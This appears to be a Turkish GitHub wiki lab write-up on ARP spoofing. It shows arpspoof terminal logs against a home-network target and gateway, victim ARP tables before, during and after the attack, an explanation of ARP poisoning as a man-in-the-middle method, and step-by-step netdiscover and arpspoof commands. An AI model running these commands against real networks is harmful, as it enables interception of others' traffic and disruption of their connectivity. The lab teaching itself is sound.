Arp spoofing - altanmelihh/Kali GitHub Wiki

C:\Users\melih>arp -a

Interface: 192.168.1.12 --- 0x4 Internet Address Physical Address Type 192.168.1.1 30-cc-21-39-0d-ec dynamic 192.168.1.2 ec-be-5f-fe-2e-9b dynamic 192.168.1.5 14-85-7f-74-7f-39 dynamic 192.168.1.51 2e-55-ac-57-79-65 dynamic 192.168.1.67 2e-55-ac-57-79-65 dynamic 192.168.1.255 ff-ff-ff-ff-ff-ff static 224.0.0.22 01-00-5e-00-00-16 static 224.0.0.251 01-00-5e-00-00-fb static 224.0.0.252 01-00-5e-00-00-fc static 239.255.255.250 01-00-5e-7f-ff-fa static 255.255.255.255 ff-ff-ff-ff-ff-ff static

1.cihaz için:

  1. cihaz:

┌──(root㉿Maxwell)-[/home/maxwell] └─# arpspoof -i eth0 -t 192.168.1.12 192.168.1.1 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65 ^C2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65 ^CCleaning up and re-arping targets... 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 30:cc:21:39:d:ec 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 30:cc:21:39:d:ec 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 30:cc:21:39:d:ec 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 30:cc:21:39:d:ec 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 30:cc:21:39:d:ec

┌──(root㉿Maxwell)-[/home/maxwell] └─#

2.cihaz:

┌──(root㉿Maxwell)-[/home/maxwell] └─# arpspoof -i eth0 -t 192.168.1.1 192.168.1.12 2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at 2e:55:ac:57:79:65 ^CCleaning up and re-arping targets... 2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at f2:28:e7:1a:66:ef 2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at f2:28:e7:1a:66:ef 2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at f2:28:e7:1a:66:ef 2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at f2:28:e7:1a:66:ef 2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at f2:28:e7:1a:66:ef 1. cihaz:

┌──(root㉿Maxwell)-[/home/maxwell] └─# arpspoof -i eth0 -t 192.168.1.12 192.168.1.1 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65 ^C2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 2e:55:ac:57:79:65 ^CCleaning up and re-arping targets... 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 30:cc:21:39:d:ec 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 30:cc:21:39:d:ec 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 30:cc:21:39:d:ec 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 30:cc:21:39:d:ec 2e:55:ac:57:79:65 f2:28:e7:1a:66:ef 0806 42: arp reply 192.168.1.1 is-at 30:cc:21:39:d:ec

┌──(root㉿Maxwell)-[/home/maxwell] └─#

2.cihaz:

┌──(root㉿Maxwell)-[/home/maxwell] └─# arpspoof -i eth0 -t 192.168.1.1 192.168.1.12 2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at 2e:55:ac:57:79:65 2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at 2e:55:ac:57:79:65 ^CCleaning up and re-arping targets... 2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at f2:28:e7:1a:66:ef 2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at f2:28:e7:1a:66:ef 2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at f2:28:e7:1a:66:ef 2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at f2:28:e7:1a:66:ef 2e:55:ac:57:79:65 30:cc:21:39:d:ec 0806 42: arp reply 192.168.1.12 is-at f2:28:e7:1a:66:ef

Saldırı anında 2e-55-ac-57-79-65

C:\Users\melih>arp -a

Interface: 192.168.1.12 --- 0x4 Internet Address Physical Address Type 192.168.1.1 2e-55-ac-57-79-65 dynamic 192.168.1.2 ec-be-5f-fe-2e-9b dynamic 192.168.1.5 14-85-7f-74-7f-39 dynamic 192.168.1.14 2e-55-ac-57-79-65 dynamic 192.168.1.51 2e-55-ac-57-79-65 dynamic 192.168.1.67 2e-55-ac-57-79-65 dynamic 192.168.1.255 ff-ff-ff-ff-ff-ff static 224.0.0.22 01-00-5e-00-00-16 static 224.0.0.251 01-00-5e-00-00-fb static 224.0.0.252 01-00-5e-00-00-fc static 239.255.255.250 01-00-5e-7f-ff-fa static 255.255.255.255 ff-ff-ff-ff-ff-ff static

Saldırı sonlandığında

C:\Users\melih>arp -a

Interface: 192.168.1.12 --- 0x4 Internet Address Physical Address Type 192.168.1.1 30-cc-21-39-0d-ec dynamic 192.168.1.2 ec-be-5f-fe-2e-9b dynamic 192.168.1.5 14-85-7f-74-7f-39 dynamic 192.168.1.14 2e-55-ac-57-79-65 dynamic 192.168.1.51 2e-55-ac-57-79-65 dynamic 192.168.1.67 2e-55-ac-57-79-65 dynamic 192.168.1.255 ff-ff-ff-ff-ff-ff static 224.0.0.22 01-00-5e-00-00-16 static 224.0.0.251 01-00-5e-00-00-fb static 224.0.0.252 01-00-5e-00-00-fc static 239.255.255.250 01-00-5e-7f-ff-fa static 255.255.255.255 ff-ff-ff-ff-ff-ff static

ARP(Address Resolution Protocol) : Adres Çözümleme Protokolü demektir. Yerel ağda IP adresini bildiği cihazın MAC adresini bulmak için kullanılır. Ağda olan bilgisayarlar birbirleri ile MAC adresleri üzerinden iletişim kurarlar. IP’sini bildiği bir bilgisayara bir paket göndereceği zaman, kaynak(Source) cihaz ARP tablosuna bakar ve hedef(Destination) cihazın MAC adresinin ARP tablosunda olup olmadığını kontrol eder. Eğer ARP tablosunda, hedef cihazın MAC adresi bulunmuyorsa, ARP protokolü çalışır ve IP’sini bildiği cihazın MAC adresini öğrenmek için bulunduğu ağa bir ARP Request(İstek) paketi gönderir. ARP Request paketinin içinde, MAC adresini öğrenmek istediği cihazın IP adresi bulunur. ARP Request’i ağdaki tüm cihazlar alır, IP’nin kendisine ait olmadığını anlayan cihazlar ARP Request paketlerini siler. IP adresinin kendisine ait olduğunu anlayan cihaz, Request paketini alır açar ve MAC Adresi bilgisini, ARP Reply(Cevap) paketi ile kaynak cihaza gönderir.

image ARP Poisoning : Saldırgan, sahte ARP Reply paketlerini, broadcast olarak yerel ağa sürekli gönderir. Hedefine gitmek isteyen cihaz ARP Request talebinde bulunduğu anda, cevap olarak saldırgandan gelen ARP Reply paketini alır. Saldırgan kendini Gateway gibi gösterir ve internete çıkacak kurbanlar, saldırganın cihazı üzerinden internete çıkar. Bu sayede kurbanın tüm trafiğini izleyebilme, verilere erişebilme şansına sahip olur. Bu nedenle ARP Spoofing, MITM(Man in the Middle/Aradaki Adam) saldırıları arasında yer alır.

image Şimdi şu zafiyeti bir de biz sömürelim!

Sanal makine olarak kurduğum Windows makineye Kali-Linux ile saldırıyı gerçekleştireceğim. Adım adım anlatacağım ve ekran görüntülerini sizlerle paylaşacağım;

Step 1 : Öncelikle Gateway’ımızı öğrenelim. image

Step 2 : ” netdiscover -r 192.198.1.0/24 ” komutu ile kurban cihazımızın IP adresini bulalım.

netdiscover -r 192.168.1.0/24

image

Step 3 : Kurban cihazda ARP tablomuzu görüntüleyelim ve gateway’in MAC adresine bakalım.

image

Step 4 : Bir de saldırgan cihazımızın MAC adresini öğrenelim.

image

Step 5 : Kurban cihazda örnek bir ping atalım. Pingimizin sıkıntısız olarak google.com’a ulaşabildiğini görüyoruz.

image

Step 6 : “Arpspoof” yazılımını kullanarak saldırıyı gerçekleştirelim. -i parametresi ile interface’i, -t parametresi ile hedef cihazın IP adresini, -r parametresi ile gateway’in IP adresini belirtiyoruz.

python arpspoof.py -i eth0 -t 192.168.1.12 -r 192.168.1.1

image

Step 7 : Saldırı başladıktan sonra kurban cihazda tekrar arp tablomuzu görüntüleyelim. Gateway’in MAC adresinin, saldırgan cihazın MAC adresi ile değiştiğini göreceğiz.

image

Step 8 : Saldırı başladıktan sonra, kurban cihazda tekrar ping atmayı deneyelim. İnternet bağlantısında problemler olduğunu göreceğiz.

image

](https://www.includekarabuk.com/kategoriler/cesitliSizmaTeknikleri/Arp-Spoofing-Saldirisi-Nedir-ve-Nasil-Yapilir.php)